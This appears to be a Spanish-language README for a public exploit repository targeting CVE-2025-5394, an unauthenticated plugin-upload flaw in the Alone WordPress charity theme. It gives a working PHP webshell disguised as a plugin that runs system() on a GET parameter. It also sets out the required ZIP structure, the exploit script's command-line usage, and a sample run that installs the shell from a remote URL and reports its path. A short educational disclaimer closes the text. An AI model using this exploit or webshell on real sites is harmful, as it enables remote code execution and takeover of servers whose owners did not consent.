
Alone – Tema de WordPress multipropósito sin ánimo de lucro para organizaciones benéficas <= 7.8.3 - Ausencia de autorización para subida arbitraria de archivos sin autenticación a través de la instalación de plugins
Alone – Tema WordPress multipropósito para caridad sin fines de lucro
Versiones: <= 7.8.3
CVE: CVE-2025-5394
Puntuación CVSS: 9.8 (Crítico)
El tema Alone para WordPress es vulnerable a subidas arbitrarias de archivos debido a una falta de comprobación de capacidades en la función alone_import_pack_install_plugin().
Esta falla permite a atacantes no autenticados subir archivos ZIP (disfrazados de plugins) desde ubicaciones remotas, logrando potencialmente ejecución remota de código.
Este repositorio contiene un script de Python que automatiza la explotación de CVE-2025-5394.
El script activa la acción AJAX vulnerable y sube un plugin falso (que contiene una webshell) directamente al servidor de WordPress.
El archivo ZIP subido debe seguir esta estructura:
shell_plugin.zip
└── shell_plugin
└── shell_plugin.php
Donde:
shell_plugin es el directorio del plugin.shell_plugin.php es un archivo de plugin PHP válido con un encabezado de plugin.Ejemplo de encabezado de plugin mínimo dentro de shell_plugin.php:
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>
python3 CVE-2025-5394.py -help
usage: CVE-2025-5394.py [-h] -u URL -s SHELL
CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-s, --shell SHELL ZIP file URL containing webshell (.zip)
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target : http://target.com/wordpress
[>] Shell URL : http://target.com/shell.php
[>] Plugin Slug : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php
Este script se proporciona solo con fines educativos y de investigación.
El autor no es responsable de ningún uso indebido o actividad ilegal realizada con este código.
Úsalo únicamente en sistemas que poseas o para los que tengas permiso explícito de prueba.
Nxploited ( Khaled Alenazi )
GitHub: https://github.com/Nxploited